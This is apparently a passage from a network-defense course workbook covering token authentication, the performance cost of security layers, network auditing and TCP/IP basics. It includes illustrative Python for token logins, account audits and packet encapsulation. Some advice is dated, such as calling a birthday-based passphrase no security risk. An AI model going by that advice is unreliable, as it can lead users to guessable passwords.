Upon receiving a new token, the user must take the following steps to access a secured network using challenge/response technology:
1. Activate the token by changing the PIN to one known only by the user. The user enters the chosen PIN on the token.
2. The user begins the logon sequence.
3. The user types in the User ID from the requesting PC.
4. The NAS passes the PIN and User ID to the authentication server as part of the logon request.
5. The authentication server generates a random challenge and sends it back to the user via the connection through the NAS.
6. It is then sent to the user, where it appears on the requesting PC screen.
7. The user types the challenge into the token, which then encrypts it using its internal DES key.
8. The token displays the encrypted response.
9. The user types the encrypted response into the requesting PC keyboard.
10. The authentication server receives the response, and using the same DES key that the token used, processes it and verifies the user and the token.
11. The authentication server sends a message to the NAS to allow the user access.
DES: (Data Encryption Standard) Definition 1: An unclassified crypto algorithm adopted by the National Bureau of Standards for public use. Definition 2: A cryptographic algorithm for the protection of unclassified data, published in Federal Information Processing Standard (FIPS) 46. The DES, which was approved by the National Institute of Standards and Technology (NIST), is intended for public and government use.
key: A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.
Figure 1-5: An example of the challenge response token authentication system.
Time-based Tokens
The challenge response token system is widely used on many networks today. There is a different type of token that is also currently used. It is the time-based token. Where the challenge response token requires the user to enter data in the token and read data back out of the token, with the time-based token the user only reads data.
Figure 1-6: An example of the time-based token authentication system.
The time-based token utilizes an authentication technique where the security token and the security server use an identical algorithm. To gain access, the user takes the code generated by the token and adds their user name and PIN to create a passcode. The passcode is combined with a seed value and the current time, which is then encrypted with an algorithm and sent to the server. The server authenticates the user by generating its own version of the valid code by accessing the pre-registered PIN and using the same seed value and algorithm to validate the user and their token.
Figure 1-7: An example of the RSA SecurID token.
Time-based and challenge response tokens are both good examples of two-factor authentication. The server validates what they know (the user name and PIN) and what they have (the authentication token).
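The following is an added example (not code from the course or from any token vendor) that simulates both exchanges end to end: the numbered challenge/response steps above and the time-based scheme. It assumes an HMAC-SHA256 keyed function in place of the token's DES operation (the Python standard library has no DES), and a one-slot drift window for the time-based code; the secrets, user name and clock values are constructed. The server side is written the way a defender would want it: the challenge is random and single-use, comparisons are constant-time, and a wrong PIN never yields a challenge.

```python
"""
Added example, not from the course: the challenge/response and time-based token
exchanges simulated end to end. HMAC-SHA256 stands in for the token's DES key
operation (assumption: the Python standard library has no DES); the message flow
follows the numbered steps in the text.
"""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional


def token_compute(key: bytes, data: bytes) -> str:
    """Stand-in for the token's keyed, non-extractable operation (DES in the text)."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()[:8].upper()


class ChallengeResponseToken:
    """The user's hand-held device: holds a key that never leaves it."""

    def __init__(self, key: bytes, default_pin: str):
        self._key = key
        self.pin = default_pin

    def change_pin(self, new_pin: str) -> None:      # step 1: activate the token
        self.pin = new_pin

    def respond(self, challenge: str) -> str:        # steps 7-8: encrypt the challenge
        return token_compute(self._key, challenge.encode())


class TimeBasedToken:
    """Display-only device: the code depends on the seed and the current time slot."""

    def __init__(self, seed: bytes, step: int = 60):
        self._seed = seed
        self.step = step

    def code(self, now: Optional[float] = None) -> str:
        slot = int((time.time() if now is None else now) // self.step)
        return token_compute(self._seed, slot.to_bytes(8, "big"))


class AuthServer:
    """Server side: knows each token's secret and the user's registered PIN."""

    def __init__(self) -> None:
        self.users: Dict[str, dict] = {}
        self.pending: Dict[str, str] = {}            # one outstanding challenge per user

    def register(self, user_id: str, pin: str, key: bytes = b"", seed: bytes = b"") -> None:
        self.users[user_id] = {"pin": pin, "key": key, "seed": seed}

    def _pin_ok(self, user_id: str, pin: str) -> bool:
        u = self.users.get(user_id)
        return u is not None and hmac.compare_digest(u["pin"], pin)

    # steps 4-5: the NAS forwards PIN + User ID, the server answers with a random challenge
    def issue_challenge(self, user_id: str, pin: str) -> Optional[str]:
        if not self._pin_ok(user_id, pin):
            return None
        challenge = secrets.token_hex(4).upper()     # 8 hex digits, never reused
        self.pending[user_id] = challenge
        return challenge

    # steps 10-11: recompute with the same key; a challenge is consumed on first use
    def verify_response(self, user_id: str, response: str) -> bool:
        challenge = self.pending.pop(user_id, None)
        if challenge is None:
            return False                             # no challenge outstanding (or replay)
        expected = token_compute(self.users[user_id]["key"], challenge.encode())
        return hmac.compare_digest(expected, response)

    # time-based: regenerate the code from the registered seed, tolerating one
    # slot of clock drift either way (assumed window, not a vendor figure)
    def verify_timecode(self, user_id: str, pin: str, code: str,
                        now: Optional[float] = None, step: int = 60, window: int = 1) -> bool:
        if not self._pin_ok(user_id, pin):
            return False
        slot = int((time.time() if now is None else now) // step)
        seed = self.users[user_id]["seed"]
        return any(hmac.compare_digest(token_compute(seed, s.to_bytes(8, "big")), code)
                   for s in range(slot - window, slot + window + 1))


def demo() -> Dict[str, bool]:
    """Run both logins with constructed secrets and return the outcomes."""
    key, seed = b"constructed-cr-key", b"constructed-seed"
    server = AuthServer()
    cr_token = ChallengeResponseToken(key, default_pin="0000")
    cr_token.change_pin("4821")                          # step 1
    server.register("alice", pin="4821", key=key, seed=seed)

    ch = server.issue_challenge("alice", cr_token.pin)   # steps 2-6
    resp = cr_token.respond(ch)                          # steps 7-9
    first = server.verify_response("alice", resp)        # steps 10-11
    replay = server.verify_response("alice", resp)       # same response sent again

    tb_token = TimeBasedToken(seed)
    t0 = 1_700_000_000.0                                 # constructed clock value
    in_time = server.verify_timecode("alice", "4821", tb_token.code(t0), now=t0 + 45)
    too_late = server.verify_timecode("alice", "4821", tb_token.code(t0), now=t0 + 400)
    wrong_pin = server.verify_timecode("alice", "1111", tb_token.code(t0), now=t0)
    return {"challenge_response": first, "replayed_response": replay,
            "time_code_in_window": in_time, "time_code_expired": too_late,
            "time_code_wrong_pin": wrong_pin}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:22s} {'accepted' if ok else 'rejected'}")
```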
Software Tokens
If an organization does not wish to purchase hardware tokens such as those described, they may opt for a software solution instead. A software token is an authentication technique using a portable device such as a Palm Pilot, Palm PC, or Wireless Telephone to carry the embedded software.
When attempting to access the secured network, the user is prompted to provide their PIN (pre-registered with the server in association with the user name) and authentication code, which is generated by the software token. This information is routed to an access server such as an RSA ACE/Server for verification. If the PIN and authentication code are valid, the user is granted access. If not, the user is denied access to the network.
Figure 1-8: An example of a Palm Pilot running RSA security software.
TASK 1C-1
Describing the Challenge Response Token Process
1. Describe the Challenge Response token process between the user, client, and server.
Each challenge/response token is pre-loaded with a DES (Data Encryption Standard) encryption key and a default user PIN unique to that token in association with a user name. Neither of these items can be extracted from the token. Upon receiving a new token, the user must follow several steps to access a secured network by using challenge/response technology.
2. Place the following steps in the proper order.
7 The user types the challenge into the token, which then encrypts it using its internal DES key.
3 The user types in the User ID from the requesting PC.
10 The authentication server receives the response and, using the same DES key that the token used, processes it and verifies the user and the token.
4 The NAS passes the PIN and User ID to the authentication server as part of the logon request.
8 The token displays the encrypted response.
11 The authentication server sends a message to the NAS to allow the user access.
1 The token is activated by changing the PIN to one known only to the user. The user enters the chosen PIN on the token.
6 The challenge is sent to the user, where it appears on the requesting PC screen.
2 The user begins the logon sequence.
9 The user types the encrypted response into the requesting PC keyboard.
5 The authentication server generates a random challenge and sends it back to the user via the connection through the NAS.
Topic 1D
The Impact of Defense
Network security protects all the information technology assets within the enterprise, including computers, servers, databases, applications, peripherals, and perhaps most importantly, data or information. Network security allows authorized users to access IT assets quickly, whenever it's needed, all the while improving communications with internal and external customers within a totally secure environment.
Implementation of security controls, whether in a layered defense or any other mode, should not, in any way, hinder the functionality of the network. Networks must be secure, but the implementation of security cannot hinder the objective and purpose of the network itself.
Of the different technologies discussed in this lesson, how many could have a negative impact on the performance of the network? If you answered all of them, you are correct. However, they do not have to have a negative impact on the network. Proper implementation of security controls will reduce the impact on the network.
How exactly do these technologies impact the network in the first place? Let's examine some of the technologies discussed previously.
Firewalls
The firewall is the first line of defense for the network. All packets that enter the network should come through this point in a properly designed network. A modern firewall is generally a system of applications and hardware working together. The jobs a firewall can be asked to perform are packet filtering, network address translation, and proxy services.
A firewall can have a negative impact on the network by blocking access to resources that should be accessible. It is possible that, because of improper configuration of a firewall, entire portions of a network become unavailable, in which case the performance hit is significant. Additionally, if an ordinary PC has been configured to be the firewall (a multihomed computer), it may not have the internal speed to perform all the functions of the firewall fast enough, resulting in latency.
Encryption
The encryption process as a whole involves taking data that is readable in plain text and using a mathematical calculation to make the text unreadable. The receiver then needs to perform a similar calculation to decrypt the message and read it in its plain text format.
The performance hit is much more obvious with encryption. If the data packets are encrypted, the information that must be transmitted is larger, and more bandwidth will be consumed. Additionally, the devices that perform the encryption and decryption have more work to do in running the algorithms that perform the task. Networks that have systems at minimum levels will be affected the most by the addition of encryption.
Computers and routers that are asked to perform encryption must be able to handle the extra workload. It is not always the network that has a performance drop; it is often the computers themselves, as they struggle to keep up with all the extra processing required to encrypt and decrypt data. File system encryption can be as much of a performance hit as encrypted network traffic.
Passwords
Forcing hard-to-remember passwords on users results in either the passwords being written down or frequent calls to the help desk to come and unlock their computer. This results in a performance hit on the overall functionality of the entire network. The password issue is a difficult one, as networks require strong passwords, but users have a hard time creating them. The network administration staff should take the time to educate users on creating strong passwords.
One of the better methods of making strong passwords that users can remember is to use phrases instead of words (which should never be used). The phrase method requires the user to think of a phrase they will remember. This way it can be related to a user's birthday and not be a security risk. For example, "I was Born on June 27!" could then be a password of "IwBoJ27!" This illustrates how easy it can be to generate secure passwords that can be remembered.
Intrusion Detection Systems
Although some think that an IDS could not have an impact on a network, in reality, it can. It is true that the IDS does not have that much of an impact on the actual packets as they move about the network; however, this is not the only type of impact the network must manage.
If an IDS is improperly configured, so that it is identifying traffic not indicative of an intrusion, and the security professionals spend their time investigating unneeded attacks, then the IDS has created a significant problem, not a solved one. An IDS that is constantly giving off false alarms is a bad thing for the network, as eventually the security team will stop responding, or respond slowly.
Auditing
If a commonly used server has had every single auditing option turned on, the computer is going to suffer a performance hit in logging all that information. If it also happens to be a file server, chances are good that available disk space will be taken up by the log files, again resulting in calls to the help desk.
This can also be a method of hiding an attacker's tracks. If an attacker gains access to a server and enables every single auditing option, it will be much more work for the administrator to search the log files for the real evidence of the security breach.
TASK 1D-1
Describing the Problems of Additional Layers of Security
1. How could adding additional layers of defense cause problems for the users of a network?
Answers may vary, but may include: Improper configuration of a firewall, NAT, or proxy can result in authorized users not being able to access resources they need to access or vice versa; users may not fully understand the modern key management process used in encryption systems, therefore, unless encryption is an integrated feature of the operating system, IP stack, or application, users may be inconvenienced; the user logon and verification process can also inconvenience users if it is too complicated.
2. How could adding additional layers of defense cause problems for the packet flow on the network?
Answers may vary, but could include: Strong encryption can increase the actual network traffic; more CPU cycles are required to generate encrypted traffic and decipher them upon receipt; IDS systems running in a very paranoid mode may create excessive auditing and alerts, sometimes resulting in false alerts.
Topic 1E
Network Auditing Concepts
Auditing entails the recording, maintenance, and protection from unauthorized access, modification, or deletion of detailed access event logs of information technology assets and network systems to ensure compliance with an established security policy. Auditing within a network systems environment involves much more than the typical recording of system activity.
Security Auditing Basics
It would be useless to put a lock on a door if it was never checked to see if it was still locked or if it was unlocked, when it was unlocked, and by whom. In checking the security of a network, answers to the following questions need to be recorded and logged for use later in case of system compromise:
What was checked?
Who did the checking?
When was it checked?
How was it checked?
Were there any findings?
compromise: An intrusion into a computer system where unauthorized disclosure, modification, or destruction of sensitive information may have occurred.
Besides the usual recording of logins, logouts, accessing files, directories and resources, and security violations, additional network security events must be audited on both sides of the network connection. Both sides means any establishing or dropping of network connections with other networks must be logged, as well as any failed network components and any misrouted or lost data while in transit. Auditing should capture the information of the following events:
All access events with use of identification and authentication mechanisms.
Any deletion of files, data, or information.
Modification of directories.
Movement of large data assets into users' address space.
Any security actions or other security-related events.
Each event should contain the following entries in the audit log:
Date and time of the event.
Name of user creating the event, as well as event origin.
Event description and type.
Name of asset in case of deletion.
Event success or failure.
Security Audits
Logged records of monitored events are kept on hand for auditing purposes. Although they can be conducted by either internal or external resources, the two typical types of security audits are operational or independent.
Operational Audit
This type of audit is usually done by internal resources to examine the operational and ongoing activities within a network system for compliance with an established security policy.
Independent Audit
An independent audit is usually conducted by external or outside resources and may be a review or audit of detailed audit logs to:
Examine system activities and access logs.
Assess the adequacy of security methods and controls.
Assess compliance with established enterprise network system policies and procedures.
Assess effectiveness of support, enabling, and core processes.
Recommend improvements in security processes, methods, and controls.
security violation: An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information contained therein or to the system itself.
audit: The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.
security audit: A search through a computer system for security problems and vulnerabilities.
Whether an audit is done as an operational or independent audit, a thorough search through the system should be conducted to detect any flaws, vulnerabilities, or problems. An IDS can alert you to network system vulnerabilities, but a security audit should be conducted to find problems within the file systems on the network. Out of this audit should come detailed reports that may give you some clues as to possible existing or future problems. These may include:
Accounts with no name, or accounts in the names of people who have left the company or group.
New accounts needing validation for authorized users.
Group accounts needing access control specifics to pinpoint who had access at what time, rather than just a group name logon.
Recent changes to file protection or changes in rights to large files.
Accounts with easily guessed passwords.
Accounts with expired or no passwords.
Any other suspicious user activity.
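The findings listed above can be produced mechanically from an account export. The following Python script is an added example written for this edit, not code from the course; it runs over a constructed sample of account records and flags each of the conditions in the list (orphaned accounts, unvalidated new accounts, group logons, expired or missing passwords, and password hashes that match a small weak-password list). The field names, the sample records, the weak-password list and the use of bare SHA-256 are all assumptions made to keep the example self-contained; a real audit would check hashes with the password store's own salted algorithm and would add a review of recent file-permission changes, which needs a change log not modelled here.

```python
import hashlib
from datetime import date, timedelta

# Constructed weak-password list (hypothetical). A real audit would use a much
# larger dictionary and the password store's own salted hash function rather
# than bare SHA-256, which is used here only to keep the sample self-contained.
WEAK_PASSWORDS = ["password", "123456", "Welcome1", "letmein"]


def pw_hash(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


WEAK_HASHES = {pw_hash(p): p for p in WEAK_PASSWORDS}

# Audit date and account export are constructed sample data, not real records;
# a real export would come from the directory service or the operating system.
TODAY = date(2024, 6, 1)
ACCOUNTS = [
    {"user": "jsmith", "owner": "J. Smith", "employed": True, "group": False,
     "created": date(2023, 1, 5), "validated": True,
     "pw_hash": pw_hash("c0rrect-H0rse!"), "pw_expires": date(2024, 9, 1)},
    {"user": "tmp_contractor", "owner": "", "employed": False, "group": False,
     "created": date(2022, 3, 1), "validated": True,
     "pw_hash": pw_hash("Welcome1"), "pw_expires": date(2023, 3, 1)},
    {"user": "newhire42", "owner": "A. Lee", "employed": True, "group": False,
     "created": date(2024, 5, 28), "validated": False,
     "pw_hash": pw_hash("x9$kL2!pQ"), "pw_expires": date(2024, 8, 28)},
    {"user": "finance_shared", "owner": "Finance", "employed": True, "group": True,
     "created": date(2021, 7, 1), "validated": True,
     "pw_hash": None, "pw_expires": None},
]


def audit_accounts(accounts, today=TODAY, new_window_days=30):
    """Return {user: [finding, ...]} for every account that needs attention.

    Each check corresponds to one item in the audit-report list above."""
    findings = {}
    cutoff = today - timedelta(days=new_window_days)
    for acct in accounts:
        notes = []
        # Accounts with no name, or whose owner has left the company or group.
        if not acct["owner"] or not acct["employed"]:
            notes.append("no named owner or owner has left")
        # New accounts that have not yet been validated for an authorized user.
        if acct["created"] >= cutoff and not acct["validated"]:
            notes.append("new account awaiting validation")
        # Group accounts: a shared logon cannot show who had access at what time.
        if acct["group"]:
            notes.append("group account: require per-user logon for access control")
        # Accounts with expired or no passwords.
        expired = acct["pw_expires"] is not None and acct["pw_expires"] < today
        if acct["pw_hash"] is None or expired:
            notes.append("expired or missing password")
        # Accounts whose password hash matches a known easily guessed password.
        if acct["pw_hash"] in WEAK_HASHES:
            notes.append("easily guessed password")
        if notes:
            findings[acct["user"]] = notes
    return findings


def format_report(findings) -> str:
    """Render the findings as the lines an audit report would carry."""
    lines = []
    for user in sorted(findings):
        for note in findings[user]:
            lines.append(f"{user}: {note}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(audit_accounts(ACCOUNTS)))
```

Run against the sample, the script reports nothing for the healthy account and one line per problem for the other three, so the output maps directly onto the report items above.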
Audit Trails
Network auditing still needs to log the audit trail, or history, of any network transaction. The requirement for any audit trail is that documentation be kept to record the historical use of the network system. But the primary purpose of a recorded audit trail is to be able to examine the detailed historical record of system use in order to replicate specific event scenarios after a compromise or exploit has occurred. An audit trail is the only way to examine the sequence of events that led up to the system's compromise or exploitation. Without an audit trail, there would be no way to find out how a compromise or exploit of the system occurred, or when it actually happened.
Handling and Preserving Audit Data
Audit data should be some of the most carefully secured data at the site and in the backups. If an intruder were to gain access to audit logs, the systems themselves would be at risk, in addition to the data.
Audit data may also become key to the investigation, apprehension, and prosecution of the perpetrator of an incident. For this reason, it is advisable to seek the advice of legal counsel when deciding how audit data should be handled. This should happen before an incident occurs.
If a data-handling plan is not adequately defined prior to an incident, it could mean that there is no recourse in the aftermath of an event, and it may create liability resulting from improper treatment of the data.
Legal Considerations
Due to the content of audit data, there are a number of legal questions that arise which might need to be addressed by your legal counsel. If you collect and save audit data, you need to be prepared for consequences resulting from both its content and its existence.
audit trail: In computer security systems, a chronological record of system resource usage. This includes user login, file access, other various activities, and whether any actual or attempted security violations occurred.
perpetrator: The entity from the external environment that is taken to be the cause of a risk. An entity in the external environment that performs an attack, i.e., a hacker.
Lesson 1: Network Defense Fundamentals 25
One area concerns the privacy of individuals. In certain instances, audit data may contain personal information. Searching through the data, even for a routine check of the system's security, could represent an invasion of privacy.
A second area of concern involves knowledge of intrusive behavior originating from your site. If an organization keeps audit data, is it responsible for examining it to search for incidents? If a host in one organization is used as a launching point for an attack against another organization, can the second organization use the audit data of the first organization to prove negligence on the part of that organization?
These examples are not meant to be comprehensive, but should motivate your organization to consider the legal issues involved with audit data.
TASK 1E-1
Describing Network Auditing
1. What are the benefits of auditing network traffic?
Logs of audited network traffic can be used to examine a detailed historical record of network and system use in order to reconstruct specific event scenarios after a compromise or exploit has occurred.
2. What is a possible drawback to network auditing?
If an intruder were to gain access to audit logs, the systems themselves would be at risk, in addition to the data.
3. Why is the handling and storage of audit data so critical?
Audit data may contain personal information. Searching through the data, even for a routine check of the system's security, could represent an invasion of privacy.
Apart from that, the very knowledge of intrusive behavior originating from your site raises the question of responsibility with regard to reporting the incident to a third party or maybe even an authority such as the FBI.
Summary
In this lesson, you walked through the process of creating a layered defense. You are able to identify why the layered defense is important and the technologies used to create one. You also examined the concepts of network auditing, including handling of data and types of audits. You have defined the five keys of network defense, described the objectives of access control methods, and identified the impact of defense on the network.
Lesson Review
1A What do authentication and availability create in the network?
Authentication and availability in a network create system assurance.
Describe the differences between one-, two-, and three-factor authentication.
One-factor authentication provides what you know, such as a password or PIN. Two-factor authentication is providing what you have, like a smart card or a token, in addition to what you know. The third factor, which provides strong authentication, is proving a user's identity, or who you are, by using biometrics. Biometrics uses a physiological characteristic to identify you, such as a fingerprint, retina scan, hand geometry, voice recognition, or iris scan, or behavioral characteristics such as keystroke recognition or signature recognition.
Is it possible to have data confidentiality without having data integrity?
No; however, it is possible to have data integrity without data confidentiality.
What is the difference between a passive threat and an active threat?
Simply put, in a passive threat, data is viewed, but in an active threat, data is modified.
1B What are the primary technologies used to create a layered defense?
A security policy implemented at various layers of the network.
Perimeter defenses, such as routers, firewalls, NAT, and proxies.
Intrusion Detection Systems (IDS) can be put in place to monitor network traffic or hosts.
Authentication has to be regularized using one-, two-, or three-factor authentication methods depending upon the requirement (machine-specific authentication may be required in some cases).
File System Security should be in place once a user is logged in, to allow or deny access to resources.
Physical access/security to the network or individual machines should be addressed.
What could be the result of skipping a layer of defense?
Security policy: Unstructured defense.
Perimeter defense: Intruders will come in.
IDS: You won't know that intruders have come in.
Authentication: Anyone can log in to your network.
File System Security: Anyone who has access to a machine can access everything on that machine.
Physical security: Anyone can access any machine.
1C Name and describe the two methods of Access Control.
Mandatory Access Control, where subjects and objects are Classified, Secret, or Top Secret.
Discretionary Access Control, where a user's identity is used in first determining certain user rights into the system, and then at each resource to see if the user has Create, Read, Update, or Delete (CRUD) privileges.
Describe the process of authentication.
Authentication is the process of determining the identity of a user who is attempting to access a system. A user provides the requested information to an authentication verification authority. The authentication verification authority uses this information, or a derivative of it, against a pre-configured database. If the values match, the user is issued appropriate credentials to access the system. The user then presents these credentials to access resources.
What are software tokens, and how can an organization benefit by using them?
A software token is an authentication technique using a portable device, such as a Palm Pilot or Palm PC. Since the token is generated via software, an organization does not have to be tied down to a particular hardware token generator. When circumstances change and they have to upgrade the strength of the token, for example, they just need to upgrade the software in the portable device rather than recall and reissue hardware devices.
1D How could a firewall have a negative impact on network performance?
A firewall can have a negative impact on the network by blocking access to resources that should be accessible. It is possible that, because of improper configuration of a firewall, entire portions of a network become unavailable. Additionally, if an ordinary PC has been configured to be the firewall (a multihomed computer), it may not have the internal speed to perform all the functions of a firewall fast enough, resulting in latency.
How can encryption affect network performance?
If the data packets are encrypted, the information that must be transmitted is larger, and therefore more bandwidth will be consumed.
How can encryption affect individual hosts?
The devices that perform encryption and decryption have more work to do in running the algorithms that perform the task.
1E What are two of the events that can be captured with auditing?
Answers may include the following: All access events with use of identification and authentication mechanisms; any deletion of files, data, or information; modification of directories; movement of large data assets into users' address space; any security actions or other security-related events.
What are two of the entries that should be captured in an event?
Answers may include the following: Date and time of the event; name of
user creating the event as well as event origin; event description and type;
name of asset in case of deletion; event successful or failed.
What are the two typical types of security audits?
Operational and independent.
Lesson 2: Advanced TCP/IP
Overview
There is one primary set of protocols that runs networks and the Internet
today. In this lesson, you will work with those protocols: the Transmission
Control Protocol (TCP) and the Internet Protocol (IP). In order to manage
the security of a network, you must become familiar with the details of how
TCP/IP functions, including core concepts, such as addressing and
subnetting, and advanced concepts, such as session establishment and packet
analysis.
Objectives
To better understand advanced TCP/IP concepts, you will:
2A Define the core concepts of TCP/IP.
Given a machine running TCP/IP, you will define the core concepts of TCP/IP, including the layering models, RFCs, addressing and subnetting, VLSM and CIDR, and the TCP/IP suite.
2B Analyze sessions of TCP.
Given a Windows Server 2003 computer, you will examine control flags, sequence numbers, and acknowledgement numbers, and you will use Network Monitor to view and analyze all of the fields of the three-way handshake and session teardowns.
2C Analyze IP.
Given a Windows Server 2003 computer, you will use Network Monitor to view and analyze all the fields of IP.
2D Analyze ICMP.
Given a Windows Server 2003 computer, you will use Network Monitor to view and analyze all the fields of ICMP.
2E Analyze TCP.
Given a Windows Server 2003 computer, you will use Network Monitor to view and analyze all the fields of TCP.
2F Analyze UDP.
Given a Windows Server 2003 computer, you will use Network Monitor to view and analyze all the fields of UDP.
Data Files
tftp.cap
fragment.cap
ping.txt
ping.cap
ftp.txt
ftp.cap
WinPcap
Wireshark
Lesson Time
6 hours
2G Analyze fragmentation.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze network traffic fragmentation.
2H Complete a full session analysis.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze a complete FTP session, frame by frame.
Topic 2A
TCP/IP Concepts
In order for two hosts to communicate, there must first be an agreed-upon method of communication for both hosts to use. The protocol that the Internet was built on, and the protocol that all hosts on the Internet use, is TCP/IP, or Transmission Control Protocol/Internet Protocol. Because the two hosts agree on the protocol they will use, we can go right into the details of the protocol itself.
The TCP/IP Model
In order for data to move from one host to another, it must be transmitted and received. There are several ways this could happen, in theory.
The data file could be sent as a whole file, intact, from one host to another.
The data file could be split in half and sent, sending and receiving two equal-sized pieces.
The data file could be split into many smaller pieces, all sent and received in a specific sequence.
It is this last method that is actually used. For example, if a user is at a host and wants to view a web page on a different host, the request and subsequent response will take many small steps to complete. In Figure 2-1, you can see the four layers of the TCP/IP Model, along with the browser's request for a web page going to the web server.
Figure 2-1: A web request moving along the TCP/IP Model.
The four layers of the TCP/IP Model are:
The Application Layer
The Transport Layer
The Internet Layer (also called the Network Layer)
The Network Access Layer (also called the Link Layer)
Note: Many of the concepts in this topic were covered in the prerequisite courses, but are provided here for review.
host: A single computer or workstation; it can be connected to a network.
server: A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
The reason that there are alternate names for these layers is that the industry has never agreed upon a standard for the names. Each of these layers is detailed as follows:
The Application Layer is the highest layer in the model, and communicates
with the software that requires the network. In our example, the software is
the web page request from a browser.
The Transport Layer is where the reliability of the communication is dealt with. There are two protocols that work at this layer, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). An immediate difference between the two is that TCP does provide for reliable delivery of data, whereas UDP provides no such guarantee.
The Internet Layer (or Network Layer) provides the mechanism required to
address and move the data from one host to the other. The primary protocol
you will examine at this layer is IP (Internet Protocol).
The Network Access Layer (or Link Layer) is where the data communication
interacts with the physical medium of the network. This is the layer that
does the actual sending and receiving of the data.
As you saw in Figure 2-1, as the web page request was initiated on the host, it moved down the layers, was transmitted across the network, and moved up the layers on the web server. These are the layers on which all network communication using TCP/IP is based. There is a different set of layers, however, called the OSI Model.
The OSI Model
The TCP/IP Model works well for TCP/IP communications, but there are many protocols and methods of communication other than TCP/IP. A standard was needed to encompass all of the communication protocols. The standard developed by the International Organization for Standardization (ISO) is called the OSI Model.
The Open Systems Interconnection (OSI) Model has seven layers, compared to the four layers of the TCP/IP Model. The seven layers of the OSI Model are:
The Application Layer
The Presentation Layer
The Session Layer
The Transport Layer
The Network Layer
The Data Link Layer
The Physical Layer
network: Two or more machines interconnected for communications.
OSI: (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.
The names of these layers are fixed, as this is an agreed-upon standard. The details of each layer are as follows:
The Application Layer is the highest layer of the OSI Model, and deals with interaction between the software and the network.
The Presentation Layer is responsible for data services such as data compression and data encryption/decryption.
The Session Layer is responsible for establishing, managing (such as packet size), and ending a session between two hosts.
The Transport Layer is responsible for error control and data recovery between two hosts. Both TCP and UDP work at this layer.
The Network Layer is responsible for logical addressing, routing, and forwarding of datagrams. IP works at this layer.
The Data Link Layer is responsible for packaging data frames for transmission on the physical medium. Error control is added at this layer, often in the form of a Cyclic Redundancy Check (CRC). This layer is subdivided into the LLC (Logical Link Control) and MAC (Media Access Control) sublayers. The MAC sublayer is associated with the physical address of the network device, and the LLC sublayer makes the association between this physical address (such as the 48-bit MAC address if using Ethernet) and the logical address (such as the 32-bit IP address if using IP) at the Network Layer.
The Physical Layer is responsible for the actual transmission and receipt of the data bit stream on the physical medium.
The OSI Model and the TCP/IP Model do fit together. In Figure 2-2, you can see that the two primary layers of concern in the TCP/IP Model (the Transport and Internet Layers) match directly with the Transport and Network Layers of the OSI Model, while the other two TCP/IP Model layers encompass two or more layers of the OSI Model.
Figure 2-2: A comparison of the OSI and TCP/IP Models.
As the data from one host flows down the layers of the model, each layer attaches a small piece of information relevant to that layer. This attachment is called the header. For example, the Network Layer header will identify the logical addresses (such as IP addresses) used for this transmission. This process of adding a header at each layer is called encapsulating. Figure 2-3 shows a visual representation of the header and the encapsulation process.
packet: A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.
Figure 2-3: Headers and the encapsulation process as data moves down the stack.
When the second host receives the data, and as the data moves up the layers,
each header will let the host know how to handle this piece of data. After all the
headers have been removed, the receiving host is left with the data as it was sent.
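To see encapsulation in bytes rather than in a figure, here is an added Python example (not part of the course text) that carries a constructed application message down two layers, a UDP header per RFC 768 and then an IPv4 header per RFC 791, and back up on the receiving side, where the IPv4 Protocol field selects the upper-layer handler and the header checksum catches corruption. Addresses, ports, the identification value and the payload are constructed sample values; only the header layouts and the protocol numbers 1, 6 and 17 are standard.

```python
import socket
import struct

# Protocol numbers from the IANA registry referenced by RFC 791.
PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17
PROTO_NAMES = {PROTO_ICMP: "ICMP", PROTO_TCP: "TCP", PROTO_UDP: "UDP"}
IPV4_HDR = "!BBHHHBBH4s4s"   # 20-byte IPv4 header without options (RFC 791)
UDP_HDR = "!HHHH"            # 8-byte UDP header (RFC 768)


def ip_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, as used for the IPv4 header checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def encapsulate_udp(payload: bytes, sport: int, dport: int) -> bytes:
    """Transport layer: prepend a UDP header. A zero checksum means 'not
    computed', which is permitted for UDP over IPv4."""
    return struct.pack(UDP_HDR, sport, dport, 8 + len(payload), 0) + payload


def encapsulate_ipv4(segment: bytes, src: str, dst: str, proto: int, ttl: int = 64) -> bytes:
    """Internet layer: prepend an IPv4 header carrying the logical addresses."""
    total_len = 20 + len(segment)
    # Version 4, IHL 5 (0x45); DF flag set (0x4000); identification is a constructed value.
    hdr = struct.pack(IPV4_HDR, 0x45, 0, total_len, 0x1234, 0x4000, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = ip_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + segment


def decapsulate_ipv4(packet: bytes) -> dict:
    """Strip the IPv4 header; the Protocol field tells the host which
    upper-layer handler should receive the remaining bytes."""
    ver_ihl, _tos, total_len, _ident, _ff, ttl, proto, _csum, src, dst = \
        struct.unpack(IPV4_HDR, packet[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    # Summing the header with its checksum in place must yield zero.
    if ip_checksum(packet[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "ttl": ttl, "protocol": PROTO_NAMES.get(proto, str(proto)),
            "payload": packet[ihl:total_len]}


def decapsulate_udp(segment: bytes) -> dict:
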